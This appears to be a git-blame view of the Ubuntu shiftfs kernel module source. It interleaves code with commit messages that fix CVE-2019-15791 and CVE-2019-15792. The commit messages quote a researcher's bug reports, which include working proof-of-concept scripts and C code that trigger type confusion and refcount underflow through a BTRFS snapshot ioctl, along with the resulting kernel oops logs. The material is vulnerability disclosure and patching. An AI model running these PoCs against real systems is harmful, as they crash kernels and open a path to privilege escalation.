0x4242:
=======================================
user@ubuntu1910vm:~/shiftfs_confuse$ cat run.sh
#!/bin/sh
sync
unshare -mUr ./run2.sh
user@ubuntu1910vm:~/shiftfs_confuse$ cat run2.sh
#!/bin/sh
set -e
mkdir -p mnt/tmpfs
mkdir -p mnt/shiftfs
mount -t tmpfs none mnt/tmpfs
mount -t shiftfs -o mark,passthrough=2 mnt/tmpfs mnt/shiftfs
mount|grep shift
gcc -o ioctl ioctl.c -Wall
./ioctl
user@ubuntu1910vm:~/shiftfs_confuse$ cat ioctl.c
#include <sys/ioctl.h>
#include <fcntl.h>
#include <err.h>
#include <unistd.h>
#include <linux/btrfs.h>
#include <sys/mman.h>
int main(void) {
// make our vmacache sequence number something like 0x4242
for (int i=0; i<0x4242; i++) {
void *x = mmap((void*)0x100000000UL, 0x1000, PROT_READ,
MAP_ANONYMOUS|MAP_PRIVATE, -1, 0);
if (x == MAP_FAILED) err(1, "mmap vmacache seqnum");
munmap(x, 0x1000);
}
int root = open("mnt/shiftfs", O_RDONLY);
if (root == -1) err(1, "open shiftfs root");
int foofd = open("/proc/self/environ", O_RDONLY);
if (foofd == -1) err(1, "open foofd");
// trigger the confusion
struct btrfs_ioctl_vol_args iocarg = {
.fd = foofd
};
ioctl(root, BTRFS_IOC_SNAP_CREATE, &iocarg);
}
user@ubuntu1910vm:~/shiftfs_confuse$ ./run.sh
none on /home/user/shiftfs_confuse/mnt/tmpfs type tmpfs (rw,relatime,uid=1000,gid=1000)
/home/user/shiftfs_confuse/mnt/tmpfs on /home/user/shiftfs_confuse/mnt/shiftfs type shiftfs (rw,relatime,mark,passthrough=2)
[ 348.103005] BUG: unable to handle page fault for address: 0000000000004289
[ 348.105060] #PF: supervisor read access in kernel mode
[ 348.106573] #PF: error_code(0x0000) - not-present page
[ 348.108102] PGD 0 P4D 0
[ 348.108871] Oops: 0000 [#1] SMP PTI
[ 348.109912] CPU: 6 PID: 2192 Comm: ioctl Not tainted 5.3.0-19-generic #20-Ubuntu
[ 348.112109] Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS 1.12.0-1 04/01/2014
[ 348.114460] RIP: 0010:shiftfs_real_ioctl+0x22e/0x410 [shiftfs]
[ 348.116166] Code: 38 44 89 ff e8 43 91 01 d3 49 89 c0 49 83 e0 fc 0f 84 ce 01 00 00 49 8b 90 c8 00 00 00 41 8b 70 40 48 8b 4a 10 89 c2 83 e2 01 <8b> 79 40 48 89 4d b8 89 f8 f7 d0 85 f0 0f 85 e8 00 00 00 85 d2 75
[ 348.121578] RSP: 0018:ffffb1e7806ebdc8 EFLAGS: 00010246
[ 348.123097] RAX: ffff9ce6302ebcc0 RBX: ffff9ce6302e90c0 RCX: 0000000000004249
[ 348.125174] RDX: 0000000000000000 RSI: 0000000000008000 RDI: 0000000000000004
[ 348.127222] RBP: ffffb1e7806ebe30 R08: ffff9ce6302ebcc0 R09: 0000000000001150
[ 348.129288] R10: ffff9ce63680e840 R11: 0000000080010d00 R12: 0000000050009401
[ 348.131358] R13: 00007ffd87558310 R14: ffff9ce60cffca88 R15: 0000000000000004
[ 348.133421] FS: 00007f77fa842540(0000) GS:ffff9ce637b80000(0000) knlGS:0000000000000000
[ 348.135753] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[ 348.137413] CR2: 0000000000004289 CR3: 000000026ff94001 CR4: 0000000000360ee0
[ 348.139451] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000
[ 348.141516] DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400
[ 348.143545] Call Trace:
[ 348.144272] shiftfs_ioctl+0x65/0x76 [shiftfs]
[ 348.145562] do_vfs_ioctl+0x407/0x670
[ 348.146620] ? putname+0x4a/0x50
[ 348.147556] ksys_ioctl+0x67/0x90
[ 348.148514] __x64_sys_ioctl+0x1a/0x20
[ 348.149593] do_syscall_64+0x5a/0x130
[ 348.150658] entry_SYSCALL_64_after_hwframe+0x44/0xa9
[ 348.152108] RIP: 0033:0x7f77fa76767b
[ 348.153140] Code: 0f 1e fa 48 8b 05 15 28 0d 00 64 c7 00 26 00 00 00 48 c7 c0 ff ff ff ff c3 66 0f 1f 44 00 00 f3 0f 1e fa b8 10 00 00 00 0f 05 <48> 3d 01 f0 ff ff 73 01 c3 48 8b 0d e5 27 0d 00 f7 d8 64 89 01 48
[ 348.158466] RSP: 002b:00007ffd875582e8 EFLAGS: 00000217 ORIG_RAX: 0000000000000010
[ 348.160610] RAX: ffffffffffffffda RBX: 0000000000000000 RCX: 00007f77fa76767b
[ 348.162644] RDX: 00007ffd87558310 RSI: 0000000050009401 RDI: 0000000000000003
[ 348.164680] RBP: 00007ffd87559320 R08: 00000000ffffffff R09: 0000000000000000
[ 348.167456] R10: 0000000000000000 R11: 0000000000000217 R12: 0000561c135ee100
[ 348.169530] R13: 00007ffd87559400 R14: 0000000000000000 R15: 0000000000000000
[ 348.171573] Modules linked in: shiftfs intel_rapl_msr intel_rapl_common kvm_intel kvm snd_hda_codec_generic irqbypass ledtrig_audio crct10dif_pclmul crc32_pclmul snd_hda_intel snd_hda_codec ghash_clmulni_intel snd_hda_core snd_hwdep aesni_intel aes_x86_64 snd_pcm crypto_simd cryptd glue_helper snd_seq_midi joydev snd_seq_midi_event snd_rawmidi snd_seq input_leds snd_seq_device snd_timer serio_raw qxl snd ttm drm_kms_helper mac_hid soundcore drm fb_sys_fops syscopyarea sysfillrect qemu_fw_cfg sysimgblt sch_fq_codel parport_pc ppdev lp parport virtio_rng ip_tables x_tables autofs4 hid_generic usbhid hid psmouse i2c_i801 ahci virtio_net lpc_ich libahci net_failover failover virtio_blk
[ 348.188617] CR2: 0000000000004289
[ 348.189586] ---[ end trace dad859a1db86d660 ]---
[ 348.190916] RIP: 0010:shiftfs_real_ioctl+0x22e/0x410 [shiftfs]
[ 348.193401] Code: 38 44 89 ff e8 43 91 01 d3 49 89 c0 49 83 e0 fc 0f 84 ce 01 00 00 49 8b 90 c8 00 00 00 41 8b 70 40 48 8b 4a 10 89 c2 83 e2 01 <8b> 79 40 48 89 4d b8 89 f8 f7 d0 85 f0 0f 85 e8 00 00 00 85 d2 75
[ 348.198713] RSP: 0018:ffffb1e7806ebdc8 EFLAGS: 00010246
[ 348.200226] RAX: ffff9ce6302ebcc0 RBX: ffff9ce6302e90c0 RCX: 0000000000004249
[ 348.202257] RDX: 0000000000000000 RSI: 0000000000008000 RDI: 0000000000000004
[ 348.204294] RBP: ffffb1e7806ebe30 R08: ffff9ce6302ebcc0 R09: 0000000000001150
[ 348.206324] R10: ffff9ce63680e840 R11: 0000000080010d00 R12: 0000000050009401
[ 348.208362] R13: 00007ffd87558310 R14: ffff9ce60cffca88 R15: 0000000000000004
[ 348.210395] FS: 00007f77fa842540(0000) GS:ffff9ce637b80000(0000) knlGS:0000000000000000
[ 348.212710] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[ 348.214365] CR2: 0000000000004289 CR3: 000000026ff94001 CR4: 0000000000360ee0
[ 348.216409] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000
[ 348.218349] DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400
Killed
user@ubuntu1910vm:~/shiftfs_confuse$
Reported-by: Jann Horn <jannh@google.com>
Signed-off-by: Christian Brauner <christian.brauner@ubuntu.com>
[ saf: use f_op->open instead as special inodes in shiftfs sbs
will not use shiftfs open f_ops ]
Signed-off-by: Seth Forshee <seth.forshee@canonical.com>
CVE-2019-15792
Acked-by: Tyler Hicks <tyhicks@canonical.com>
Signed-off-by: Stefan Bader <stefan.bader@canonical.com>
2019-11-01 13:19:16 +00:00
|
|
|
static int shiftfs_real_fdget(const struct file *file, struct fd *lowerfd)
|
|
|
|
{
|
|
|
|
struct file *realfile;
|
|
|
|
|
|
|
|
if (file->f_op->open != shiftfs_open &&
|
|
|
|
file->f_op->open != shiftfs_dir_open)
|
|
|
|
return -EINVAL;
|
|
|
|
|
|
|
|
realfile = file->private_data;
|
|
|
|
lowerfd->flags = 0;
|
|
|
|
lowerfd->file = realfile;
|
|
|
|
|
|
|
|
/* Did the flags change since open? */
|
|
|
|
if (unlikely(file->f_flags & ~lowerfd->file->f_flags))
|
|
|
|
return shiftfs_change_flags(lowerfd->file, file->f_flags);
|
|
|
|
|
|
|
|
return 0;
|
|
|
|
}
|
|
|
|
|
2019-04-04 13:39:12 +00:00
|
|
|
static ssize_t shiftfs_read_iter(struct kiocb *iocb, struct iov_iter *iter)
|
|
|
|
{
|
|
|
|
struct file *file = iocb->ki_filp;
|
|
|
|
struct fd lowerfd;
|
|
|
|
const struct cred *oldcred;
|
|
|
|
ssize_t ret;
|
|
|
|
|
|
|
|
if (!iov_iter_count(iter))
|
|
|
|
return 0;
|
|
|
|
|
|
|
|
ret = shiftfs_real_fdget(file, &lowerfd);
|
|
|
|
if (ret)
|
|
|
|
return ret;
|
|
|
|
|
|
|
|
oldcred = shiftfs_override_creds(file->f_path.dentry->d_sb);
|
|
|
|
ret = vfs_iter_read(lowerfd.file, iter, &iocb->ki_pos,
|
|
|
|
shiftfs_iocb_to_rwf(iocb));
|
|
|
|
revert_creds(oldcred);
|
|
|
|
|
|
|
|
shiftfs_file_accessed(file);
|
|
|
|
|
|
|
|
fdput(lowerfd);
|
|
|
|
return ret;
|
|
|
|
}
|
|
|
|
|
|
|
|
static ssize_t shiftfs_write_iter(struct kiocb *iocb, struct iov_iter *iter)
|
|
|
|
{
|
|
|
|
struct file *file = iocb->ki_filp;
|
|
|
|
struct inode *inode = file_inode(file);
|
|
|
|
struct fd lowerfd;
|
|
|
|
const struct cred *oldcred;
|
|
|
|
ssize_t ret;
|
|
|
|
|
|
|
|
if (!iov_iter_count(iter))
|
|
|
|
return 0;
|
|
|
|
|
|
|
|
inode_lock(inode);
|
|
|
|
/* Update mode */
|
|
|
|
shiftfs_copyattr(inode->i_private, inode);
|
|
|
|
ret = file_remove_privs(file);
|
|
|
|
if (ret)
|
|
|
|
goto out_unlock;
|
|
|
|
|
|
|
|
ret = shiftfs_real_fdget(file, &lowerfd);
|
|
|
|
if (ret)
|
|
|
|
goto out_unlock;
|
|
|
|
|
|
|
|
oldcred = shiftfs_override_creds(file->f_path.dentry->d_sb);
|
|
|
|
file_start_write(lowerfd.file);
|
|
|
|
ret = vfs_iter_write(lowerfd.file, iter, &iocb->ki_pos,
|
|
|
|
shiftfs_iocb_to_rwf(iocb));
|
|
|
|
file_end_write(lowerfd.file);
|
|
|
|
revert_creds(oldcred);
|
|
|
|
|
|
|
|
/* Update size */
|
|
|
|
shiftfs_copyattr(inode->i_private, inode);
|
|
|
|
|
|
|
|
fdput(lowerfd);
|
|
|
|
|
|
|
|
out_unlock:
|
|
|
|
inode_unlock(inode);
|
|
|
|
return ret;
|
|
|
|
}
|
|
|
|
|
|
|
|
static int shiftfs_fsync(struct file *file, loff_t start, loff_t end,
|
|
|
|
int datasync)
|
|
|
|
{
|
|
|
|
struct fd lowerfd;
|
|
|
|
const struct cred *oldcred;
|
|
|
|
int ret;
|
|
|
|
|
|
|
|
ret = shiftfs_real_fdget(file, &lowerfd);
|
|
|
|
if (ret)
|
|
|
|
return ret;
|
|
|
|
|
|
|
|
oldcred = shiftfs_override_creds(file->f_path.dentry->d_sb);
|
|
|
|
ret = vfs_fsync_range(lowerfd.file, start, end, datasync);
|
|
|
|
revert_creds(oldcred);
|
|
|
|
|
|
|
|
fdput(lowerfd);
|
|
|
|
return ret;
|
|
|
|
}
|
|
|
|
|
|
|
|
static int shiftfs_mmap(struct file *file, struct vm_area_struct *vma)
|
|
|
|
{
|
2019-10-02 07:57:14 +00:00
|
|
|
struct file *realfile = file->private_data;
|
2019-04-04 13:39:12 +00:00
|
|
|
const struct cred *oldcred;
|
|
|
|
int ret;
|
|
|
|
|
|
|
|
if (!realfile->f_op->mmap)
|
|
|
|
return -ENODEV;
|
|
|
|
|
|
|
|
if (WARN_ON(file != vma->vm_file))
|
|
|
|
return -EIO;
|
|
|
|
|
|
|
|
oldcred = shiftfs_override_creds(file->f_path.dentry->d_sb);
|
|
|
|
vma->vm_file = get_file(realfile);
|
|
|
|
ret = call_mmap(vma->vm_file, vma);
|
|
|
|
revert_creds(oldcred);
|
|
|
|
|
|
|
|
shiftfs_file_accessed(file);
|
|
|
|
|
2019-11-06 15:38:57 +00:00
|
|
|
if (ret) {
|
|
|
|
/*
|
|
|
|
* Drop refcount from new vm_file value and restore original
|
|
|
|
* vm_file value
|
|
|
|
*/
|
|
|
|
vma->vm_file = file;
|
|
|
|
fput(realfile);
|
|
|
|
} else {
|
|
|
|
/* Drop refcount from previous vm_file value */
|
|
|
|
fput(file);
|
|
|
|
}
|
2019-04-04 13:39:12 +00:00
|
|
|
|
|
|
|
return ret;
|
|
|
|
}
|
|
|
|
|
|
|
|
static long shiftfs_fallocate(struct file *file, int mode, loff_t offset,
|
|
|
|
loff_t len)
|
|
|
|
{
|
|
|
|
struct inode *inode = file_inode(file);
|
|
|
|
struct inode *loweri = inode->i_private;
|
|
|
|
struct fd lowerfd;
|
|
|
|
const struct cred *oldcred;
|
|
|
|
int ret;
|
|
|
|
|
|
|
|
ret = shiftfs_real_fdget(file, &lowerfd);
|
|
|
|
if (ret)
|
|
|
|
return ret;
|
|
|
|
|
|
|
|
oldcred = shiftfs_override_creds(file->f_path.dentry->d_sb);
|
|
|
|
ret = vfs_fallocate(lowerfd.file, mode, offset, len);
|
|
|
|
revert_creds(oldcred);
|
|
|
|
|
|
|
|
/* Update size */
|
|
|
|
shiftfs_copyattr(loweri, inode);
|
|
|
|
|
|
|
|
fdput(lowerfd);
|
|
|
|
return ret;
|
|
|
|
}
|
|
|
|
|
|
|
|
static int shiftfs_fadvise(struct file *file, loff_t offset, loff_t len,
|
|
|
|
int advice)
|
|
|
|
{
|
|
|
|
struct fd lowerfd;
|
|
|
|
const struct cred *oldcred;
|
|
|
|
int ret;
|
|
|
|
|
|
|
|
ret = shiftfs_real_fdget(file, &lowerfd);
|
|
|
|
if (ret)
|
|
|
|
return ret;
|
|
|
|
|
|
|
|
oldcred = shiftfs_override_creds(file->f_path.dentry->d_sb);
|
|
|
|
ret = vfs_fadvise(lowerfd.file, offset, len, advice);
|
|
|
|
revert_creds(oldcred);
|
|
|
|
|
|
|
|
fdput(lowerfd);
|
|
|
|
return ret;
|
|
|
|
}
|
|
|
|
|
2020-05-20 11:44:27 +00:00
|
|
|
static int shiftfs_override_ioctl_creds(int cmd, const struct super_block *sb,
|
2019-04-04 13:39:12 +00:00
|
|
|
const struct cred **oldcred,
|
|
|
|
struct cred **newcred)
|
|
|
|
{
|
2019-11-01 18:35:25 +00:00
|
|
|
struct shiftfs_super_info *sbinfo = sb->s_fs_info;
|
2019-04-04 13:39:12 +00:00
|
|
|
kuid_t fsuid = current_fsuid();
|
|
|
|
kgid_t fsgid = current_fsgid();
|
|
|
|
|
|
|
|
*oldcred = shiftfs_override_creds(sb);
|
|
|
|
|
|
|
|
*newcred = prepare_creds();
|
|
|
|
if (!*newcred) {
|
|
|
|
revert_creds(*oldcred);
|
|
|
|
return -ENOMEM;
|
|
|
|
}
|
|
|
|
|
2019-11-01 18:35:25 +00:00
|
|
|
(*newcred)->fsuid = shift_kuid(sb->s_user_ns, sbinfo->userns, fsuid);
|
|
|
|
(*newcred)->fsgid = shift_kgid(sb->s_user_ns, sbinfo->userns, fsgid);
|
2019-04-04 13:39:12 +00:00
|
|
|
|
|
|
|
/* clear all caps to prevent bypassing capable() checks */
|
|
|
|
cap_clear((*newcred)->cap_bset);
|
|
|
|
cap_clear((*newcred)->cap_effective);
|
|
|
|
cap_clear((*newcred)->cap_inheritable);
|
|
|
|
cap_clear((*newcred)->cap_permitted);
|
|
|
|
|
2020-05-20 11:44:27 +00:00
|
|
|
if (cmd == BTRFS_IOC_SNAP_DESTROY) {
|
|
|
|
kuid_t kuid_root = make_kuid(sb->s_user_ns, 0);
|
|
|
|
/*
|
|
|
|
* Allow the root user in the container to remove subvolumes
|
|
|
|
* from other users.
|
|
|
|
*/
|
|
|
|
if (uid_valid(kuid_root) && uid_eq(fsuid, kuid_root))
|
|
|
|
cap_raise((*newcred)->cap_effective, CAP_DAC_OVERRIDE);
|
|
|
|
}
|
|
|
|
|
2019-04-04 13:39:12 +00:00
|
|
|
put_cred(override_creds(*newcred));
|
|
|
|
return 0;
|
|
|
|
}
|
|
|
|
|
|
|
|
static inline void shiftfs_revert_ioctl_creds(const struct cred *oldcred,
|
|
|
|
struct cred *newcred)
|
|
|
|
{
|
|
|
|
return shiftfs_revert_object_creds(oldcred, newcred);
|
|
|
|
}
|
|
|
|
|
2019-04-04 13:39:13 +00:00
|
|
|
static inline bool is_btrfs_snap_ioctl(int cmd)
|
|
|
|
{
|
|
|
|
if ((cmd == BTRFS_IOC_SNAP_CREATE) || (cmd == BTRFS_IOC_SNAP_CREATE_V2))
|
|
|
|
return true;
|
|
|
|
|
|
|
|
return false;
|
|
|
|
}
|
|
|
|
|
UBUNTU: SAUCE: shiftfs: Fix refcount underflow in btrfs ioctl handling
BugLink: https://bugs.launchpad.net/bugs/1850867
shiftfs_btrfs_ioctl_fd_replace() installs an fd referencing a
file from the lower filesystem without taking an additional
reference to that file. After the btrfs ioctl completes this fd
is closed, which then puts a reference to that file, leading to a
refcount underflow. Original bug report and test case from Jann
Horn is below.
Fix this, and at the sametime simplify the management of the fd
to the lower file for the ioctl. In
shiftfs_btrfs_ioctl_fd_replace(), take the missing reference to
the lower file and set FDPUT_FPUT so that this reference will get
dropped on fdput() in error paths. Do not maintain the struct fd
in the caller, as it the fd installed in the fd table is
sufficient to properly clean up. Finally, remove the fdput() in
shiftfs_btrfs_ioctl_fd_restore() as it is redundant with the
__close_fd() call.
Original report from Jann Horn:
In shiftfs_btrfs_ioctl_fd_replace() ("//" comments added by me):
src = fdget(oldfd);
if (!src.file)
return -EINVAL;
// src holds one reference (assuming multithreaded execution)
ret = shiftfs_real_fdget(src.file, lfd);
// lfd->file is a file* now, but shiftfs_real_fdget didn't take any
// extra references
fdput(src);
// this drops the only reference we were holding on src, and src was
// the only thing holding a reference to lfd->file. lfd->file may be
// dangling at this point.
if (ret)
return ret;
*newfd = get_unused_fd_flags(lfd->file->f_flags);
if (*newfd < 0) {
// always a no-op
fdput(*lfd);
return *newfd;
}
fd_install(*newfd, lfd->file);
// fd_install() consumes a counted reference, but we don't hold any
// counted references. so at this point, if lfd->file hasn't been freed
// yet, its refcount is one lower than it ought to be.
[...]
// the following code is refcount-neutral, so the refcount stays one too
// low.
if (ret)
shiftfs_btrfs_ioctl_fd_restore(cmd, *lfd, *newfd, arg, v1, v2);
shiftfs_real_fdget() is implemented as follows:
static int shiftfs_real_fdget(const struct file *file, struct fd *lowerfd)
{
struct shiftfs_file_info *file_info = file->private_data;
struct file *realfile = file_info->realfile;
lowerfd->flags = 0;
lowerfd->file = realfile;
/* Did the flags change since open? */
if (unlikely(file->f_flags & ~lowerfd->file->f_flags))
return shiftfs_change_flags(lowerfd->file, file->f_flags);
return 0;
}
Therefore, the following PoC will cause reference count overdecrements; I ran it
with SLUB debugging enabled and got the following splat:
=======================================
user@ubuntu1910vm:~/shiftfs$ cat run.sh
sync
unshare -mUr ./run2.sh
t run2user@ubuntu1910vm:~/shiftfs$ cat run2.sh
set -e
mkdir -p mnt/tmpfs
mkdir -p mnt/shiftfs
mount -t tmpfs none mnt/tmpfs
mount -t shiftfs -o mark,passthrough=2 mnt/tmpfs mnt/shiftfs
mount|grep shift
touch mnt/tmpfs/foo
gcc -o ioctl ioctl.c -Wall
./ioctl
user@ubuntu1910vm:~/shiftfs$ cat ioctl.c
int main(void) {
int root = open("mnt/shiftfs", O_RDONLY);
if (root == -1) err(1, "open shiftfs root");
int foofd = openat(root, "foo", O_RDONLY);
if (foofd == -1) err(1, "open foofd");
struct btrfs_ioctl_vol_args iocarg = {
.fd = foofd
};
ioctl(root, BTRFS_IOC_SNAP_CREATE, &iocarg);
sleep(1);
void *map = mmap(NULL, 0x1000, PROT_READ, MAP_SHARED, foofd, 0);
if (map != MAP_FAILED) munmap(map, 0x1000);
}
user@ubuntu1910vm:~/shiftfs$ ./run.sh
none on /home/user/shiftfs/mnt/tmpfs type tmpfs (rw,relatime,uid=1000,gid=1000)
/home/user/shiftfs/mnt/tmpfs on /home/user/shiftfs/mnt/shiftfs type shiftfs (rw,relatime,mark,passthrough=2)
[ 183.463452] general protection fault: 0000 [#1] SMP PTI
[ 183.467068] CPU: 1 PID: 2473 Comm: ioctl Not tainted 5.3.0-19-generic #20-Ubuntu
[ 183.472170] Hardware name: QEMU Standard PC (Q35 + ICH9, 2009), BIOS 1.12.0-1 04/01/2014
[ 183.476830] RIP: 0010:shiftfs_mmap+0x20/0xd0 [shiftfs]
[ 183.478524] Code: 20 cf 5d c3 c3 0f 1f 44 00 00 0f 1f 44 00 00 55 48 89 e5 41 57 41 56 41 55 41 54 48 8b 87 c8 00 00 00 4c 8b 68 10 49 8b 45 28 <48> 83 78 60 00 0f 84 97 00 00 00 49 89 fc 49 89 f6 48 39 be a0 00
[ 183.484585] RSP: 0018:ffffae48007c3d40 EFLAGS: 00010206
[ 183.486290] RAX: 6b6b6b6b6b6b6b6b RBX: ffff93f1fb7908a8 RCX: 7800000000000000
[ 183.489617] RDX: 8000000000000025 RSI: ffff93f1fb792208 RDI: ffff93f1f69fa400
[ 183.491975] RBP: ffffae48007c3d60 R08: ffff93f1fb792208 R09: 0000000000000000
[ 183.494311] R10: ffff93f1fb790888 R11: 00007f1d01d10000 R12: ffff93f1fb7908b0
[ 183.496675] R13: ffff93f1f69f9900 R14: ffff93f1fb792208 R15: ffff93f22f102e40
[ 183.499011] FS: 00007f1d01cd1540(0000) GS:ffff93f237a40000(0000) knlGS:0000000000000000
[ 183.501679] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[ 183.503568] CR2: 00007f1d01bc4c10 CR3: 0000000242726001 CR4: 0000000000360ee0
[ 183.505901] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000
[ 183.508229] DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400
[ 183.510580] Call Trace:
[ 183.511396] mmap_region+0x417/0x670
[ 183.512592] do_mmap+0x3a8/0x580
[ 183.513655] vm_mmap_pgoff+0xcb/0x120
[ 183.514863] ksys_mmap_pgoff+0x1ca/0x2a0
[ 183.516155] __x64_sys_mmap+0x33/0x40
[ 183.517352] do_syscall_64+0x5a/0x130
[ 183.518548] entry_SYSCALL_64_after_hwframe+0x44/0xa9
[ 183.520196] RIP: 0033:0x7f1d01bfaaf6
[ 183.521372] Code: 00 00 00 00 f3 0f 1e fa 41 f7 c1 ff 0f 00 00 75 2b 55 48 89 fd 53 89 cb 48 85 ff 74 37 41 89 da 48 89 ef b8 09 00 00 00 0f 05 <48> 3d 00 f0 ff ff 77 62 5b 5d c3 0f 1f 80 00 00 00 00 48 8b 05 61
[ 183.527210] RSP: 002b:00007ffdf50bae98 EFLAGS: 00000246 ORIG_RAX: 0000000000000009
[ 183.529582] RAX: ffffffffffffffda RBX: 0000000000000001 RCX: 00007f1d01bfaaf6
[ 183.531811] RDX: 0000000000000001 RSI: 0000000000001000 RDI: 0000000000000000
[ 183.533999] RBP: 0000000000000000 R08: 0000000000000004 R09: 0000000000000000
[ 183.536199] R10: 0000000000000001 R11: 0000000000000246 R12: 00005616cf6f5140
[ 183.538448] R13: 00007ffdf50bbfb0 R14: 0000000000000000 R15: 0000000000000000
[ 183.540714] Modules linked in: shiftfs intel_rapl_msr intel_rapl_common kvm_intel kvm irqbypass snd_hda_codec_generic ledtrig_audio snd_hda_intel snd_hda_codec snd_hda_core crct10dif_pclmul snd_hwdep crc32_pclmul ghash_clmulni_intel snd_pcm aesni_intel snd_seq_midi snd_seq_midi_event aes_x86_64 crypto_simd snd_rawmidi cryptd joydev input_leds snd_seq glue_helper qxl snd_seq_device snd_timer ttm drm_kms_helper drm snd fb_sys_fops syscopyarea sysfillrect sysimgblt serio_raw qemu_fw_cfg soundcore mac_hid sch_fq_codel parport_pc ppdev lp parport virtio_rng ip_tables x_tables autofs4 hid_generic usbhid hid virtio_net net_failover psmouse ahci i2c_i801 libahci lpc_ich virtio_blk failover
[ 183.560350] ---[ end trace 4a860910803657c2 ]---
[ 183.561832] RIP: 0010:shiftfs_mmap+0x20/0xd0 [shiftfs]
[ 183.563496] Code: 20 cf 5d c3 c3 0f 1f 44 00 00 0f 1f 44 00 00 55 48 89 e5 41 57 41 56 41 55 41 54 48 8b 87 c8 00 00 00 4c 8b 68 10 49 8b 45 28 <48> 83 78 60 00 0f 84 97 00 00 00 49 89 fc 49 89 f6 48 39 be a0 00
[ 183.569438] RSP: 0018:ffffae48007c3d40 EFLAGS: 00010206
[ 183.571102] RAX: 6b6b6b6b6b6b6b6b RBX: ffff93f1fb7908a8 RCX: 7800000000000000
[ 183.573362] RDX: 8000000000000025 RSI: ffff93f1fb792208 RDI: ffff93f1f69fa400
[ 183.575655] RBP: ffffae48007c3d60 R08: ffff93f1fb792208 R09: 0000000000000000
[ 183.577893] R10: ffff93f1fb790888 R11: 00007f1d01d10000 R12: ffff93f1fb7908b0
[ 183.580166] R13: ffff93f1f69f9900 R14: ffff93f1fb792208 R15: ffff93f22f102e40
[ 183.582411] FS: 00007f1d01cd1540(0000) GS:ffff93f237a40000(0000) knlGS:0000000000000000
[ 183.584960] CS: 0010 DS: 0000 ES: 0000 CR0: 0000000080050033
[ 183.586796] CR2: 00007f1d01bc4c10 CR3: 0000000242726001 CR4: 0000000000360ee0
[ 183.589035] DR0: 0000000000000000 DR1: 0000000000000000 DR2: 0000000000000000
[ 183.591279] DR3: 0000000000000000 DR6: 00000000fffe0ff0 DR7: 0000000000000400
=======================================
Disassembly of surrounding code:
55 push rbp
4889E5 mov rbp,rsp
4157 push r15
4156 push r14
4155 push r13
4154 push r12
488B87C8000000 mov rax,[rdi+0xc8]
4C8B6810 mov r13,[rax+0x10]
498B4528 mov rax,[r13+0x28]
4883786000 cmp qword [rax+0x60],byte +0x0 <-- GPF HERE
0F8497000000 jz near 0xcc
4989FC mov r12,rdi
4989F6 mov r14,rsi
This is an attempted dereference of 0x6b6b6b6b6b6b6b6b, which is POISON_FREE; I
think this corresponds to the load of "realfile->f_op->mmap" in the source code.
Reported-by: Jann Horn <jannh@google.com>
Signed-off-by: Seth Forshee <seth.forshee@canonical.com>
CVE-2019-15791
Acked-by: Tyler Hicks <tyhicks@canonical.com>
Signed-off-by: Stefan Bader <stefan.bader@canonical.com>
2019-11-01 15:41:03 +00:00
|
|
|
static int shiftfs_btrfs_ioctl_fd_restore(int cmd, int fd, void __user *arg,
|
2019-04-04 13:39:13 +00:00
|
|
|
struct btrfs_ioctl_vol_args *v1,
|
|
|
|
struct btrfs_ioctl_vol_args_v2 *v2)
|
|
|
|
{
|
|
|
|
int ret;
|
|
|
|
|
|
|
|
if (!is_btrfs_snap_ioctl(cmd))
|
|
|
|
return 0;
|
|
|
|
|
|
|
|
if (cmd == BTRFS_IOC_SNAP_CREATE)
|
|
|
|
ret = copy_to_user(arg, v1, sizeof(*v1));
|
|
|
|
else
|
|
|
|
ret = copy_to_user(arg, v2, sizeof(*v2));
|
|
|
|
|
|
|
|
__close_fd(current->files, fd);
|
|
|
|
kfree(v1);
|
|
|
|
kfree(v2);
|
|
|
|
|
2021-04-09 18:10:37 +00:00
|
|
|
return ret ? -EFAULT: 0;
|
2019-04-04 13:39:13 +00:00
|
|
|
}
|
|
|
|
|
|
|
|
static int shiftfs_btrfs_ioctl_fd_replace(int cmd, void __user *arg,
|
|
|
|
struct btrfs_ioctl_vol_args **b1,
|
|
|
|
struct btrfs_ioctl_vol_args_v2 **b2,
|
|
|
|
int *newfd)
|
|
|
|
{
|
|
|
|
int oldfd, ret;
|
|
|
|
struct fd src;
|
UBUNTU: SAUCE: shiftfs: Fix refcount underflow in btrfs ioctl handling
BugLink: https://bugs.launchpad.net/bugs/1850867
shiftfs_btrfs_ioctl_fd_replace() installs an fd referencing a
file from the lower filesystem without taking an additional
reference to that file. After the btrfs ioctl completes this fd
is closed, which then puts a reference to that file, leading to a
refcount underflow. Original bug report and test case from Jann
Horn is below.
Fix this, and at the sametime simplify the management of the fd
to the lower file for the ioctl. In
shiftfs_btrfs_ioctl_fd_replace(), take the missing reference to
the lower file and set FDPUT_FPUT so that this reference will get
dropped on fdput() in error paths. Do not maintain the struct fd
in the caller, as it the fd installed in the fd table is
sufficient to properly clean up. Finally, remove the fdput() in
shiftfs_btrfs_ioctl_fd_restore() as it is redundant with the
__close_fd() call.
Original report from Jann Horn:
In shiftfs_btrfs_ioctl_fd_replace() ("//" comments added by me):
src = fdget(oldfd);
if (!src.file)
return -EINVAL;
// src holds one reference (assuming multithreaded execution)
ret = shiftfs_real_fdget(src.file, lfd);
// lfd->file is a file* now, but shiftfs_real_fdget didn't take any
// extra references
fdput(src);
// this drops the only reference we were holding on src, and src was
// the only thing holding a reference to lfd->file. lfd->file may be
// dangling at this point.
if (ret)
return ret;
*newfd = get_unused_fd_flags(lfd->file->f_flags);
if (*newfd < 0) {
// always a no-op
fdput(*lfd);
return *newfd;
}
fd_install(*newfd, lfd->file);
// fd_install() consumes a counted reference, but we don't hold any
// counted references. so at this point, if lfd->file hasn't been freed
// yet, its refcount is one lower than it ought to be.
[...]
// the following code is refcount-neutral, so the refcount stays one too
// low.
if (ret)
shiftfs_btrfs_ioctl_fd_restore(cmd, *lfd, *newfd, arg, v1, v2);
shiftfs_real_fdget() is implemented as follows:
static int shiftfs_real_fdget(const struct file *file, struct fd *lowerfd)
{
